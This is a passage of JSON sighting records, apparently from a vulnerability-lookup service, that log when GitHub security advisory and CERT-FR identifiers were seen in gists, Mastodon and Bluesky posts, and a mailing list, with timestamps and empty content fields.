"https://gist.github.com/safer-bot/c5e63c4f6733c7351923406c897b0d87", "content": "", "creation_timestamp": "2025-07-16T10:50:28.000000Z"}, {"uuid": "aa87e573-4bfa-4945-98b3-9cf492b74290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/c5e63c4f6733c7351923406c897b0d87", "content": "", "creation_timestamp": "2025-07-16T10:50:28.000000Z"}, {"uuid": "31454540-c708-4e60-b47f-42c5145ccd3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/c5e63c4f6733c7351923406c897b0d87", "content": "", "creation_timestamp": "2025-07-16T10:50:28.000000Z"}, {"uuid": "672b968c-0e13-4c74-ad91-a023f736ff4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2ae22b849f38c7eb9074b72b979b0", "content": "", "creation_timestamp": "2025-07-16T04:09:29.000000Z"}, {"uuid": "acf29530-ff8d-4e6a-af5c-02271ec1ee1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "580e99f6-3906-47f8-b6f8-938bd9d64429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/719e7a7a4ddc83e6257d4845b085759a", "content": "", "creation_timestamp": "2025-07-16T13:37:25.000000Z"}, {"uuid": "db4672d9-e707-4124-9175-243fc373f331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9q3-g4p5-5q2r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114495668072808013", "content": "", "creation_timestamp": "2025-05-12T15:54:08.200298Z"}, {"uuid": "18e15c97-4c8b-4167-a029-5f6de77d0991", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98cv-wqjx-wx8f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114495668072808013", "content": "", "creation_timestamp": "2025-05-12T15:54:08.265801Z"}, {"uuid": "11001d94-c124-49c6-bd49-0d73a139c173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-020", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3loydipbaoj2n", "content": "", "creation_timestamp": "2025-05-12T15:56:53.561171Z"}, {"uuid": "548781bc-9bc6-4637-b458-596d7d3a1cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prwh-7838-xf82", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114676933739618253", "content": "", "creation_timestamp": "2025-06-13T16:12:22.847304Z"}, {"uuid": "affca35c-9d51-4870-8563-7d0f9fb6efbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m98c-vgpc-9655", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819039202029902", "content": "", "creation_timestamp": "2025-07-08T18:31:40.352730Z"}, {"uuid": "fb157c18-c316-45a3-97a5-5691338e5e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "78df9ab3-d68d-4390-b041-e733b61ec245", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/38346a9351f29a3a56bfae039422e868", "content": "", "creation_timestamp": "2025-07-16T04:37:01.000000Z"}, {"uuid": "50266586-b115-4913-aeb8-a5a8306c2640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "20ed58ea-6092-45e9-a8a5-2ad1247425a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4v56-3xvj-xvfr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819039202029902", "content": "", "creation_timestamp": "2025-07-08T18:31:40.502411Z"}, {"uuid": "33801ce2-b7dd-431a-93d1-eb99ffee26de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "5ef8a22d-3100-43f7-b579-1ce8d8b892ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "7305cb82-d6c3-4cfd-bef1-7a4a31a42d32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "9c5b55e2-ab63-4997-8be6-5fafaeb8c87f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "ac40827f-b89b-429f-b95b-458fe584db29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "75a64343-c0b2-4365-b55b-01f3719ff71d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqx-4fm8-6qc9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819040307208152", "content": "", "creation_timestamp": "2025-07-08T18:31:57.481185Z"}, {"uuid": "6052826d-d207-4312-b3ab-8fd557c92b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmfg-rjjm-rjrj", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "25925ffc-36d3-4a26-8294-2796bc8cc699", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "54563570-0a20-45a2-802f-648e769a14ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/24ff77b43c55125ac1820ae22fe0693b", "content": "", "creation_timestamp": "2025-07-16T04:38:08.000000Z"}, {"uuid": "a53f988c-d54f-44ec-b947-ec4f70d68ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "45f5461c-7f3c-453b-bfda-131ec45829f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "62518c9f-27e2-46cf-8e1b-2a669b1a462a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/c093359151f9b7591e797ef8d2aebc68", "content": "", "creation_timestamp": "2025-07-16T11:03:19.000000Z"}, {"uuid": "408ab1f1-1ebc-4320-86a3-b1eaf6097e07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m98c-vgpc-9655", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819040307208152", "content": "", "creation_timestamp": "2025-07-08T18:31:57.667895Z"}, {"uuid": "4a975c4f-883e-45f1-a97d-ea3ff9fba783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "68424b59-9270-4f5b-9a0e-4a75bade1f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "fce4b084-b524-4c2d-b09f-f32583084312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "e597153a-2c25-4698-b4ed-7f31ef44abca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "425d1e83-4ad7-4dbb-ac4f-522d5daa8438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "672a78bc-dc9b-421a-b92a-0cb80e6c1758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2cb61debe66a6e25f7fc56c28c4ecf3c", "content": "", "creation_timestamp": "2025-07-16T04:40:46.000000Z"}, {"uuid": "eb6e3ec8-2092-41bc-8285-b9e434cf6fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4v56-3xvj-xvfr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819040307208152", "content": "", "creation_timestamp": "2025-07-08T18:31:57.854286Z"}, {"uuid": "39304c87-ec2c-40f1-a57e-ac47857b762b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmhh-8rxq-fp9g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853319755970178", "content": "", "creation_timestamp": "2025-07-14T19:49:41.704083Z"}, {"uuid": "4c0b4bc3-8066-45ed-b80c-7d45b09ad36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hm4x-r5hc-794f", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853319755970178", "content": "", "creation_timestamp": "2025-07-14T19:49:41.784450Z"}, {"uuid": "b6a5df0c-5dda-447e-96cc-a7deb0548181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh3h-j545-h8c9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853319755970178", "content": "", "creation_timestamp": "2025-07-14T19:49:41.858770Z"}, {"uuid": "80b2fb89-083d-423e-9d34-599919e1f76a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh4-9f7v-fhrc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853319755970178", "content": "", "creation_timestamp": "2025-07-14T19:49:41.935149Z"}, {"uuid": "e49abefb-28d4-45c7-bf6b-85880735e6d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/e9c71676c596cb9332472a340b908da2", "content": "", "creation_timestamp": "2025-07-16T04:42:30.000000Z"}, {"uuid": "3294dc02-5f5e-4f1c-a247-89815cc33891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "2c1a89d2-7fad-4295-83bb-1b800226cf39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3q26-f695-pp76", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114779544615525397", "content": "", "creation_timestamp": "2025-07-01T19:07:40.875119Z"}, {"uuid": "8d95a4f6-f18c-405c-921a-c9e8f305d41b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/e9c71676c596cb9332472a340b908da2", "content": "", "creation_timestamp": "2025-07-16T04:42:30.000000Z"}, {"uuid": "b8e77179-2363-4fc1-83a5-39a964baca5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "1e180f87-4068-4753-b9bf-c5925103ea35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "439f00b1-0de1-4b8c-9964-2d731e5d0000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "9e8a241f-ba1c-4158-9014-aff1225cb2f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "5ab8b1dd-5a50-4467-a23c-476f293472f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "d3e83813-11c2-45bc-a7cc-5799137501e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "095fcb9e-fd6a-424c-82dd-6735c18b7526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8cqv-pj7f-pwpc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114700962193020532", "content": "", "creation_timestamp": "2025-06-17T22:03:08.173321Z"}, {"uuid": "b97a5543-bd06-4287-8cd2-0b5ad956d6ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-432r-9455-7f9x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114779554157879189", "content": "", "creation_timestamp": "2025-07-01T19:10:06.245271Z"}, {"uuid": "69098cec-1778-497d-a743-16d8a43df199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6qjf-g333-pv38", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853381616905127", "content": "", "creation_timestamp": "2025-07-14T20:05:23.951395Z"}, {"uuid": "933e8520-fb80-4794-9472-ef5da7d87c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/e9c71676c596cb9332472a340b908da2", "content": "", "creation_timestamp": "2025-07-16T04:42:30.000000Z"}, {"uuid": "11783265-3cc9-4c36-bd03-beb10dccc55d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "5afc4e61-1cd5-45e8-937d-3aeaea005106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "7d3241aa-fa98-4ae8-b3a8-e09ccf25a1c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "91dc07c7-5a42-4273-9727-d88063e99813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/037f0ab593971a3f8120f2b374ce07da", "content": "", "creation_timestamp": "2025-07-16T09:27:39.000000Z"}, {"uuid": "ba8d3274-c97b-462d-879e-32943d4f5fd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/c093359151f9b7591e797ef8d2aebc68", "content": "", "creation_timestamp": "2025-07-16T11:03:19.000000Z"}, {"uuid": "7987391f-4a4d-4428-9e96-24582166c01a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/c093359151f9b7591e797ef8d2aebc68", "content": "", "creation_timestamp": "2025-07-16T11:03:19.000000Z"}, {"uuid": "72b702a3-12d1-495e-bf66-fc06c17bd464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/c093359151f9b7591e797ef8d2aebc68", "content": "", "creation_timestamp": "2025-07-16T11:03:19.000000Z"}, {"uuid": "8fabc8b6-ae44-46aa-80d3-8a3e6a4fc7fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/c093359151f9b7591e797ef8d2aebc68", "content": "", "creation_timestamp": "2025-07-16T11:03:19.000000Z"}, {"uuid": "cfdfe5b7-20e1-4c69-aab8-3814611ef92b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-022", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lq3734nb3h22", "content": "", "creation_timestamp": "2025-05-26T12:40:53.822946Z"}, {"uuid": "dbe3432e-66ec-4e9d-bf77-5560e93e2da2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg8h-j46f-w952", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114779561289242286", "content": "", "creation_timestamp": "2025-07-01T19:11:55.656212Z"}, {"uuid": "dcf567a4-2a9a-46c7-907e-d4c0bbccfaa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vcm3-5w3f-9f45", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853413029843502", "content": "", "creation_timestamp": "2025-07-14T20:13:23.302621Z"}, {"uuid": "3a7f602f-f768-4efc-8e05-b7ee7eb09a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/6dc68b75d3a2f5766f034fc771605445", "content": "", "creation_timestamp": "2025-07-16T04:43:36.000000Z"}, {"uuid": "1f25802c-94a8-42da-80e2-2c781701d9d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/6dc68b75d3a2f5766f034fc771605445", "content": "", "creation_timestamp": "2025-07-16T04:43:36.000000Z"}, {"uuid": "cf371130-c4b4-4cd9-96ee-7421f6be4f35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/429eb5065c57b5f314e94285b42826c9", "content": "", "creation_timestamp": "2025-07-16T09:28:15.000000Z"}, {"uuid": "55ffe01e-b562-470a-827a-d89fc68a8fac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/b657f0f4d1cda95326a06f05a2b62087", "content": "", "creation_timestamp": "2025-07-16T09:28:47.000000Z"}, {"uuid": "cf881730-e455-4f32-abc4-3e46b40aa7e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0e58f397ddd960ea1a88b4968e5d0fe4", "content": "", "creation_timestamp": "2025-07-16T11:07:07.000000Z"}, {"uuid": "8f9033ed-7ec3-4f95-8e4a-08c4ea93a254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-022", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114574180514996446", "content": "", "creation_timestamp": "2025-05-26T12:40:54.755510Z"}, {"uuid": "92f9de07-c139-44ac-899c-3dea955de0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jx8-rcjx-vmwf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114853538351646770", "content": "", "creation_timestamp": "2025-07-14T20:45:15.774704Z"}, {"uuid": "48439def-8da4-4900-a07d-a77e167769b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/6dc68b75d3a2f5766f034fc771605445", 